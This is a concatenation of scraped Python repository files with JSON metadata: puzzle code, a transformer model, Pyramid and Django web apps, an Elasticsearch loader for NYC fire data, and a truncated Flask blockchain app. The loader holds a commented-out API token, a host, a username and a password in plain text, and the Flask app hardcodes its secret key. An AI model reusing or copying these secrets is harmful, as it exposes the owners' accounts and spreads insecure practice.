content[2:]]\n rules = {row[0]: row[1] for row in rules}\n return polymer, rules\n\n\ndef get_char_counts(\n polymer: str, rules: Dict[str, str], num_iter: int\n) -> Dict[str, int]:\n \"\"\"Find the character counts for the final polymer. \n\n Instead of building up the actual consecutive polymers, we can simply keep \n track of the counts of the chars that make up the polymers. \n \n To count the numbers of each character, we simply increment the count for\n each character in the key in the pair_count dictionary. Note that this will\n double count the elements *in the middle*. But not the start and end \n characters. So to fix this, we will have to add one count for each of them. \n Thanks to @DaniellVan for spotting this. \n\n Example:\n If our template is \"NNCB\" and the rules state: \n {\n \"NN\" -> \"C\"\n ...\n }\n we know that the first pair: \"NN\" should become: \"NCN\".\n Since \"NN\" appears once, we know that the new substrings will have counts:\n \"NC\" : 1\n \"CN\" : 1\n\n Args:\n polymer: the template polymer\n rules: the mappings from pairs to single chars\n num_iter: number of iterations we should build the polymer. \n\n Returns:\n The counts for each character in the final polymer after \n `num_iter` steps. \n \"\"\"\n pair_counts = defaultdict(int)\n char_counts = defaultdict(int)\n\n for pair in zip(polymer[:-1], polymer[1:]):\n pair_counts[\"\".join(pair)] += 1\n\n for _ in range(num_iter):\n temp = defaultdict(int)\n for pair, count in pair_counts.items():\n middle = rules[pair]\n temp[pair[0] + middle] += count\n temp[middle + pair[1]] += count\n\n pair_counts = temp\n\n for pair, count in pair_counts.items():\n char_counts[pair[0]] += count\n char_counts[pair[1]] += count\n\n char_counts[polymer[0]] += 1\n char_counts[polymer[-1]] += 1\n\n return char_counts\n\n\ndef part_1(polymer: str, rules: List[List[str]]) -> int:\n char_counts = get_char_counts(polymer, rules, 10)\n return (max(char_counts.values()) - min(char_counts.values())) // 2\n\n\ndef part_2(polymer: str, rules: List[List[str]]) -> int:\n char_counts = get_char_counts(polymer, rules, 40)\n return (max(char_counts.values()) - min(char_counts.values())) // 2\n\n\nif __name__ == \"__main__\":\n polymer, rules = read_input(\"input.txt\")\n print(f\"part 1: {part_1(polymer, rules)}\")\n print(f\"part 2: {part_2(polymer, rules)}\")\n", "repo_name": "steffenvan/advent_of_code", "sub_path": "day14/day14.py", "file_name": "day14.py", "file_ext": "py", "file_size_in_byte": 2939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 60, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "7965984604", "text": "from copy import deepcopy as c\n\nimport torch.nn as nn\nimport torch.nn.functional as f\n\nfrom model.decoder import Decoder, DecoderLayer\nfrom model.encoder import Encoder, EncoderLayer\nfrom model.layers import MultiLayerAttention, PositionwiseFeedForward, PositionalEncoding, Embeddings\n\n\nclass Generator(nn.Module):\n def __init__(self, d_model, vocab):\n super(Generator, self).__init__()\n self.proj = nn.Linear(d_model, vocab)\n\n def forward(self, x):\n return f.log_softmax(self.proj(x), dim=-1)\n\n\nclass EncoderDecoder(nn.Module):\n def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n super(EncoderDecoder, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n self.src_embed = src_embed\n self.tgt_embed = tgt_embed\n self.generator = generator\n\n def encode(self, src, src_mask):\n return self.encoder(self.src_embed(src), src_mask)\n\n def decode(self, mem, src_mask, tgt, tgt_msk):\n return self.decoder(self.tgt_embed(tgt), mem, src_mask, tgt_msk)\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n return self.decode(self.encode(src, src_mask), src_mask, tgt,\n tgt_mask)\n\n\ndef make_model(src_voc, tgt_voc, n=6, d_model=512, d_ff=2048, h=8, dropout=0.1):\n attn = MultiLayerAttention(h, d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n pos = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), n),\n Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), n),\n nn.Sequential(Embeddings(d_model, src_voc), c(pos)),\n nn.Sequential(Embeddings(d_model, tgt_voc), c(pos)),\n Generator(d_model, tgt_voc))\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model\n", "repo_name": "nobodyminus/transformer", "sub_path": "model/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "model.layers.MultiLayerAttention", "line_number": 41, "usage_type": "call"}, {"api_name": "model.layers.PositionwiseFeedForward", "line_number": 42, "usage_type": "call"}, {"api_name": "model.layers.PositionalEncoding", "line_number": 43, "usage_type": "call"}, {"api_name": "model.decoder", "line_number": 44, "usage_type": "name"}, {"api_name": "model.encoder.Encoder", "line_number": 44, "usage_type": "call"}, {"api_name": "model.encoder.EncoderLayer", "line_number": 44, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 44, "usage_type": "call"}, {"api_name": "model.decoder.Decoder", "line_number": 45, "usage_type": "call"}, {"api_name": "model.decoder.DecoderLayer", "line_number": 45, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "model.layers.Embeddings", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "model.layers.Embeddings", "line_number": 47, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 47, "usage_type": "call"}, {"api_name": "model.decoder.parameters", "line_number": 49, "usage_type": "call"}, {"api_name": "model.decoder", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "model.decoder", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "40964986764", "text": "import logging\n\nfrom pyramid.config import Configurator\nfrom pyramid_beaker import session_factory_from_settings\nfrom pyramid.decorator import reify\nfrom pyramid.request import Request as BaseRequest\nfrom pyramid.security import authenticated_userid\nfrom pyramid.exceptions import Forbidden\n\nfrom marteau import queue\n\n\nclass Request(BaseRequest):\n \"\"\"\n Custom request class\n \"\"\"\n @reify\n def user(self):\n \"\"\"\n Get the logged in user\n \"\"\"\n return authenticated_userid(self)\n\n\ndef main(global_config, **settings):\n # defaults\n if 'mako.directories' not in settings:\n settings['mako.directories'] = 'marteauweb:templates'\n\n session_factory = session_factory_from_settings(settings)\n\n # configure the waitress logger\n logger = logging.getLogger('waitress')\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n\n # creating the config and the queue\n config = Configurator(settings=settings, session_factory=session_factory)\n config.registry['queue'] = queue.Queue()\n\n # Use our custom Request class\n config.set_request_factory(Request)\n\n # Both of our chosen policies configure a \"forbidden view\" to handle\n # unauthenticated access. We have to resolve this conflict by explicitly\n # picking which one we want to use.\n config.add_forbidden_view(\"pyramid_persona.views.forbidden\")\n\n # routing\n config.add_route('index', '/')\n config.add_route('profile', '/profile')\n config.add_route('purge', '/purge')\n config.add_route('reset', '/reset')\n config.add_route('test', '/test')\n config.add_route('cancel', '/test/{jobid}/cancel')\n config.add_route('delete', '/test/{jobid}/delete')\n config.add_route('replay', '/test/{jobid}/replay')\n config.add_route('job', '/test/{jobid}')\n config.add_route('nodes', '/nodes')\n config.add_route('node_enable', '/nodes/{name}/enable')\n config.add_route('node_test', '/nodes/{name}/test')\n config.add_route('node', '/nodes/{name}')\n config.add_route('report_index', '/report/{jobid}')\n config.add_route('report_file', '/report/{jobid}/{filename:.*}')\n config.add_route('docs_file', '/docs/{file:.*}')\n config.add_route('docs_index', '/docs')\n config.add_route('addjob', '/addjob')\n config.add_route('fixture_options', '/fixture_options/{fixture:.*}')\n config.add_route('project_options', '/project_options/{project:.*}')\n config.add_route('hosts', '/hosts')\n config.add_route('verify_host', '/hosts/{host:.*}/verify')\n config.add_route('host', '/hosts/{host:.*}')\n config.add_static_view('media', 'marteauweb:media/')\n config.add_route('karaoke', '/media/marteau.kar')\n config.add_route('socket_io', 'socket.io/*remaining')\n\n config.scan(\"marteauweb.views\")\n config.scan(\"marteauweb.socketio_service\")\n return config.make_wsgi_app()\n", "repo_name": "mozilla-services/marteau-web", "sub_path": "marteauweb/wsgiapp.py", "file_name": "wsgiapp.py", "file_ext": "py", "file_size_in_byte": 2914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyramid.request.Request", "line_number": 13, "usage_type": "name"}, {"api_name": "pyramid.security.authenticated_userid", "line_number": 22, "usage_type": "call"}, {"api_name": "pyramid.decorator.reify", "line_number": 17, "usage_type": "name"}, {"api_name": "pyramid_beaker.session_factory_from_settings", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pyramid.config.Configurator", "line_number": 40, "usage_type": "call"}, {"api_name": "marteau.queue.Queue", "line_number": 41, "usage_type": "call"}, {"api_name": "marteau.queue", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "5350548845", "text": "from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .models import *\nfrom .mission import *\nfrom .user import *\nfrom .message import to_json as message_to_json\nfrom django.utils import timezone\nfrom .someFuncs import *\n\n\nclass DealFindMissions(APIView):\n @staticmethod\n def post(request, user_ID):\n uid = checkUID(request.data)\n if uid is 0:\n return Response(\"Unauthorized\", 401)\n elif User.objects.filter(id=user_ID).count() == 0:\n return Response(\"User Not Found\", 404)\n elif uid != user_ID:\n return Response(\"Unauthorized\", 401)\n else:\n missions = request.data.get('missionIDs', [])\n if len(missions) == 0:\n return Response(\"Bad request\", 400)\n else:\n missions.sort()\n mission_detail = []\n for mission_id in missions:\n if Mission.objects.filter(id=mission_id).count() == 0:\n return Response(\"mission Not Found\", 404)\n else:\n mission_detail.append(mission_to_json(Mission.objects.get(id=mission_id)))\n response = Response(mission_detail, 200)\n return response\n\n\nclass DealFindMessages(APIView):\n @staticmethod\n def post(request, user_ID):\n uid = checkUID(request.data)\n if uid is 0:\n return Response(\"Unauthorized\", 401)\n elif User.objects.filter(id=user_ID).count() == 0:\n return Response(\"User Not Found\", 404)\n elif uid != user_ID:\n return Response(\"Unauthorized\", 401)\n else:\n messages = request.data.get('messageIDs', [])\n if len(messages) == 0:\n return Response(\"Bad request\", 400)\n else:\n messages.sort()\n message_detail = []\n for message_id in messages:\n if Message.objects.filter(id=message_id).count() == 0:\n return Response(\"message Not Found\", 404)\n else:\n message_detail.append(message_to_json(Message.objects.get(id=message_id)))\n response = Response(message_detail, 200)\n return response\n\n\nclass DealFindEvaluations(APIView):\n @staticmethod\n def post(request, user_ID):\n uid = checkUID(request.data)\n if uid is 0:\n return Response(\"Unauthorized\", 401)\n elif User.objects.filter(id=user_ID).count() == 0:\n return Response(\"User Not Found\", 404)\n elif uid != user_ID:\n return Response(\"Unauthorized\", 401)\n else:\n evaluations = request.data.get('evaluationIDs', [])\n if len(evaluations) == 0:\n return Response(\"Bad request\", 400)\n else:\n evaluations.sort()\n evaluation_detail = []\n for evaluation_id in evaluations:\n if Evaluation.objects.filter(id=evaluation_id).count() == 0:\n return Response(\"evaluation Not Found\", 404)\n else:\n evaluation_detail.append(evaluation_to_json(Evaluation.objects.get(id=evaluation_id)))\n response = Response(evaluation_detail, 200)\n return response\n\n\nclass DealFindUsers(APIView):\n @staticmethod\n def post(request, getter_ID, mission_ID):\n uid = checkUID(request.data)\n if uid is 0:\n response = Response(\"Unauthorized\", 401)\n elif uid != getter_ID:\n return Response(\"Unauthorized\", 401)\n elif User.objects.filter(id=getter_ID).count() == 0:\n response = Response(\"getter Not Found\", 404)\n elif Mission.objects.filter(id=mission_ID).count() == 0:\n response = Response(\"mission Not Found\", 404)\n else:\n gettees = request.data.get('getteeIDs', [])\n if len(gettees) == 0:\n return Response(\"Bad request\", 400)\n else:\n mission = Mission.objects.get(id=mission_ID)\n gettee_detail = []\n for gettee_ID in gettees:\n if User.objects.filter(id=gettee_ID).count() == 0:\n return Response(\"gettee Not Found\", 404)\n elif gettee_ID == getter_ID:\n return Response(\"Bad Request\", 400)\n elif Mission.objects.get(id=mission_ID).members.filter(id=gettee_ID).count() is 0 \\\n and Mission.objects.get(id=mission_ID).publisher.id is not gettee_ID \\\n and Mission.objects.get(id=mission_ID).applicants.filter(id=gettee_ID).count() is 0:\n return Response(\"Forbidden\", 403)\n elif gettee_ID == getter_ID:\n return Response(\"Bad Request\", 400)\n else:\n gettee = User.objects.get(id=gettee_ID)\n score = 0\n name = gettee.username\n evaluations = []\n for evaluation in gettee.evaluationsAsEvaluatee.all():\n score += evaluation.evaluationScore\n evaluations.append(evaluation.id)\n if gettee.evaluationsAsEvaluatee.all().count() is not 0:\n score /= gettee.evaluationsAsEvaluatee.all().count()\n if mission.members.filter(id=getter_ID).count() is not 0 \\\n or mission.publisher.id is getter_ID:\n tele = gettee.tele\n data = {\"missionStatus\": \"tele can be seen\", \"tele\": tele, \"averageScore\": score,\n \"username\": name, \"evaluationIDs\": evaluations}\n gettee_detail.append(data)\n else:\n data = {\"missionStatus\": \"tele can not be seen\", \"averageScore\": score, \"username\": name,\n \"evaluationIDs\": evaluations}\n gettee_detail.append(data)\n response=Response(gettee_detail, 200)\n return response\n", "repo_name": "ddaa2000/PKUGrouper-Android", "sub_path": "backend/PkuGrouper/backend/finds.py", "file_name": "finds.py", "file_ext": "py", "file_size_in_byte": 6293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 44, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 56, "usage_type": "call"}, {"api_name": "message.to_json", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 85, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 89, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 94, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 96, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 110, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 116, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "mission.members.filter", "line_number": 129, "usage_type": "call"}, {"api_name": "mission.members", "line_number": 129, "usage_type": "attribute"}, {"api_name": "mission.publisher", "line_number": 130, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "42922220008", "text": "from sodapy import Socrata\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nimport argparse\nimport sys\nimport os\nimport re\n\n# Creates a parser. Parser is the thing where you add your arguments. \nparser = argparse.ArgumentParser(description='311 Requests Data')\n# In the parse, we have two arguments to add.\n# The first one is a required argument for the program to run. If page_size is not passed in, don’t let the program to run\nparser.add_argument('--page_size', type=int, help='how many rows to get per page', required=True)\n# The second one is an optional argument for the program to run. It means that with or without it your program should be able to work.\nparser.add_argument('--num_pages', type=int, help='how many pages to get in total')\n# Take the command line arguments passed in (sys.argv) and pass them through the parser.\n# Then you will end up with variables that contains page size and num pages. \nargs = parser.parse_args(sys.argv[1:])\nprint(args)\n\nINDEX_NAME=os.environ[\"INDEX_NAME\"]\nDATASET_ID=os.environ[\"DATASET_ID\"]\nAPP_TOKEN=os.environ[\"APP_TOKEN\"]\nES_HOST=os.environ[\"ES_HOST\"]\nES_USERNAME=os.environ[\"ES_USERNAME\"]\nES_PASSWORD=os.environ[\"ES_PASSWORD\"]\n\n#INDEX_NAME=\"fire\"\n#DATASET_ID=\"8m42-w767\"\n#APP_TOKEN=\"TksBNcbpTQxd3rUwbWl53LBPZ\"\n#ES_HOST =\"https://search-project01-greg-teo-ykdzvexlqrvboe3eofb2wyqypm.us-east-2.es.amazonaws.com\"\n#ES_USERNAME=\"gmteo\"\n#ES_PASSWORD=\"[1]Abcd1234\"\n\n\nif __name__ == '__main__':\n try:\n resp = requests.put(f\"{ES_HOST}/{INDEX_NAME}\", auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD),\n json={\n \"settings\": {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 1\n },\n \"mappings\": {\n \"properties\": {\n \"starfire_incident_id\": {\"type\": \"keyword\"},\n \"incident_datetime\": {\"type\": \"date\"},\n \"incident_borough\": {\"type\": \"keyword\"},\n \"zipcode\": {\"type\": \"keyword\"},\n \"incident_classification_group\": {\"type\": \"keyword\"},\n \"incident_response_seconds_qy\": {\"type\": \"float\"},\n \"engines_assigned_quantity\": {\"type\": \"float\"},\n }\n }, \n }\n )\n resp.raise_for_status()\n print(resp.json())\n \n except Exception as e:\n print(\"Index already exists! Skipping!\")\n \n es_rows=[]\n \n if args.num_pages is None:\n client = Socrata(\"data.cityofnewyork.us\", APP_TOKEN, timeout=10000)\n count = [int(s) for s in re.findall(r'-?\\d+\\.?\\d*', str(client.get(DATASET_ID, select='COUNT(*)', where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL')))]\n #For testing purposes\n #count1 = count[0] - 8690000\n #When ready, change limit = count[0]\n rows = client.get(DATASET_ID, select='*' , where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL', order = 'incident_datetime', limit = count[0])\n \n for row in rows:\n try:\n # Convert\n es_row = {}\n es_row[\"starfire_incident_id\"] = row[\"starfire_incident_id\"]\n es_row[\"incident_datetime\"] = row[\"incident_datetime\"]\n es_row[\"incident_borough\"] = row[\"incident_borough\"]\n es_row[\"zipcode\"] = row[\"zipcode\"]\n es_row[\"incident_classification_group\"] = row[\"incident_classification_group\"]\n es_row[\"incident_response_seconds_qy\"] = float(row[\"incident_response_seconds_qy\"])\n es_row[\"engines_assigned_quantity\"] = float(row[\"engines_assigned_quantity\"])\n \n except Exception as e:\n #Comment out print command if loading more than 100k\n #print (f\"Error!: {e}, skipping row: {row}\")\n continue\n \n es_rows.append(es_row)\n \n bulk_upload_data = \"\"\n for line in es_rows:\n #Comment out print command if loading more than 100k\n #print(f'Handling row {line[\"starfire_incident_id\"]}')\n action = '{\"index\": {\"_index\": \"' + INDEX_NAME + '\", \"_type\": \"_doc\", \"_id\": \"' + line[\"starfire_incident_id\"] + '\"}}'\n data = json.dumps(line)\n bulk_upload_data += f\"{action}\\n\"\n bulk_upload_data += f\"{data}\\n\"\n #print (bulk_upload_data)\n \n try:\n # Upload to Elasticsearch by creating a document\n resp = requests.post(f\"{ES_HOST}/_bulk\",\n # We upload es_row to Elasticsearch\n data=bulk_upload_data,auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD), headers = {\"Content-Type\": \"application/x-ndjson\"})\n resp.raise_for_status()\n print ('Done!')\n print ('Total Number of Rows: ',count[0])\n print ('Total Number of Pages: None')\n print('Offset: 0')\n \n # If it fails, skip that row and move on.\n except Exception as e:\n print(f\"Failed to insert in ES: {e}\")\n \n #print(es_rows)\n es_rows.clear()\n \n else:\n for num_pages in range(args.num_pages):\n offset = num_pages * args.page_size\n client = Socrata(\"data.cityofnewyork.us\", APP_TOKEN, timeout=10000)\n rows = client.get(DATASET_ID, limit=args.page_size, where='starfire_incident_id IS NOT NULL AND incident_datetime IS NOT NULL', offset = {offset}, order = 'incident_datetime')\n \n for row in rows:\n try:\n # Convert\n es_row = {}\n es_row[\"starfire_incident_id\"] = row[\"starfire_incident_id\"]\n es_row[\"incident_datetime\"] = row[\"incident_datetime\"]\n es_row[\"incident_borough\"] = row[\"incident_borough\"]\n es_row[\"zipcode\"] = row[\"zipcode\"]\n es_row[\"incident_classification_group\"] = row[\"incident_classification_group\"]\n es_row[\"incident_response_seconds_qy\"] = float(row[\"incident_response_seconds_qy\"])\n es_row[\"engines_assigned_quantity\"] = float(row[\"engines_assigned_quantity\"])\n \n except Exception as e:\n #Comment out print command if loading more than 100k\n #print (f\"Error!: {e}, skipping row: {row}\")\n continue\n \n es_rows.append(es_row)\n #print(es_rows)\n #print('offset: ', offset)\n #print('num pages: ', num_pages)\n \n bulk_upload_data = \"\"\n for line in es_rows:\n #Comment out print command if loading more than 100k\n #print(f'Handling row {line[\"starfire_incident_id\"]}')\n action = '{\"index\": {\"_index\": \"' + INDEX_NAME + '\", \"_type\": \"_doc\", \"_id\": \"' + line[\"starfire_incident_id\"] + '\"}}'\n data = json.dumps(line)\n bulk_upload_data += f\"{action}\\n\"\n bulk_upload_data += f\"{data}\\n\"\n #print (bulk_upload_data)\n \n try:\n # Upload to Elasticsearch by creating a document\n resp = requests.post(f\"{ES_HOST}/_bulk\",\n # We upload es_row to Elasticsearch\n data=bulk_upload_data,auth=HTTPBasicAuth(ES_USERNAME, ES_PASSWORD), headers = {\"Content-Type\": \"application/x-ndjson\"})\n resp.raise_for_status()\n \n # If it fails, skip that row and move on.\n except Exception as e:\n print(f\"Failed to insert in ES: {e}\")\n \n #print(es_rows)\n es_rows.clear()\n \n print ('Done!')\n print ('Total Number of Rows: ',args.num_pages * args.page_size)\n print ('Total Number of Pages: ', args.num_pages)\n print('Offset for page',num_pages+1,': ', offset) \n", "repo_name": "gregteo/Big-Data-Technologies", "sub_path": "project01/src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 39, "usage_type": "call"}, {"api_name": "sodapy.Socrata", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 107, "usage_type": "call"}, {"api_name": "sodapy.Socrata", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 161, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "70715551874", "text": "# export FLASK_APP=node_server.py\n# flask run --port 8000\n# export FLASK_APP=run.py\n# flask run\n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, url_for, jsonify\nfrom forms import SignupForm, PostForm,LoginForm\nfrom werkzeug.urls import url_parse\nfrom models import User\nfrom flask_login import LoginManager, login_required, current_user, login_user, logout_user\nimport hashlib\nimport requests\nimport json\nimport datetime\n\n# Creación de la instancia\n# __name__: Nombre del módulo o paquete de la aplicación\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = '7110c8ae51a4b5af97be6534caef90e4bb9bdcb3380af008f90b23a5d1616bf319bc298105da20fe'\n\nlogin_manager = LoginManager(app)\nlogin_manager.login_view = 'login'\n\nposts = []\nnumposts = 0\n\nCONNECTED_NODE_ADDRESS = \"http://127.0.0.1:8000\"\n\ndef fetch_posts():\n \"\"\"\n Function to fetch the chain from a blockchain node, parse the\n data and store it locally.\n \"\"\"\n get_chain_address = \"{}/chain\".format(CONNECTED_NODE_ADDRESS)\n response = requests.get(get_chain_address)\n if response.status_code == 200:\n content = []\n chain = json.loads(response.content)\n for block in chain[\"chain\"]:\n for tx in block[\"transactions\"]:\n tx[\"index\"] = block[\"index\"]\n tx[\"hash\"] = block[\"previous_hash\"]\n content.append(tx)\n\n global posts\n posts = sorted(content, key=lambda k: k['timestamp'],\n reverse=True)\n\n# Decorador route encargado de indicar a Flask qué URL debe ejecutar su correspondiente función\n@app.route('/')\ndef index():\n\treturn render_template(\"base_template.html\")\n\n@app.route('/admin/post/', methods=[\"GET\", \"POST\"])\n@login_required\ndef post_form():\n form = PostForm()\n\n global numposts\n\n if form.validate_on_submit():\n total = form.total.data\n content = form.content.data\n\n post_object = {\"author\": current_user.name, \"content\": content, \"total\": total}\n\n numposts += 1\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect(url_for('post_form'))\n\n return render_template('admin/post_form.html', form = form)\n\n@app.route('/admin/postShopping', methods=[\"POST\"])\n@login_required\ndef postShopping():\n\n new_tx_address = \"{}/new_transaction_\".format(CONNECTED_NODE_ADDRESS)\n\n response = requests.post(new_tx_address,\n json=request.get_json(),\n headers={'Content-type': 'application/json'})\n\n if response.status_code == 201:\n return jsonify({\n \"status\": 201\n })\n\n return jsonify({\n \"status\": 400\n })\n\n@app.route('/admin/lectura/', methods=[\"GET\", \"POST\"])\n@login_required\ndef post_read():\n fetch_posts()\n\n if current_user.is_admin:\n return render_template('admin/post_read.html', title = 'Ventas realizadas', posts = posts, node_address=CONNECTED_NODE_ADDRESS, readable_time=timestamp_to_string)\n\n return redirect(url_for('index'))\n\n# Flask responde por defecto ante peticiones GET. Si se quiere responder otro tipo de petición, se debe indicar con el parámetro methods\n@app.route(\"/signup/\", methods=[\"GET\", \"POST\"])\ndef show_signup_form():\n if not current_user.is_admin:\n return redirect(url_for('index'))\n\n form = SignupForm()\n\n if form.validate_on_submit():\n name = form.name.data\n email = form.email.data\n password = form.password.data\n\n # Creamos el usuario y lo guardamos\n user_id = int(hashlib.md5(email.encode()).hexdigest()[:8], 16)\n\n user = User(user_id, name, email, password)\n\n # Guardar en la base de datos los datos del usuario\n user.register(user)\n\n # Dejamos al usuario logueado\n # login_user(user, remember=True)\n\n next_page = request.args.get('next', None)\n\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)\n return render_template(\"signup_form.html\", form=form)\n\n\n@app.route(\"/admin/deleteUser\", methods=[\"GET\"])\ndef deleteUser():\n if 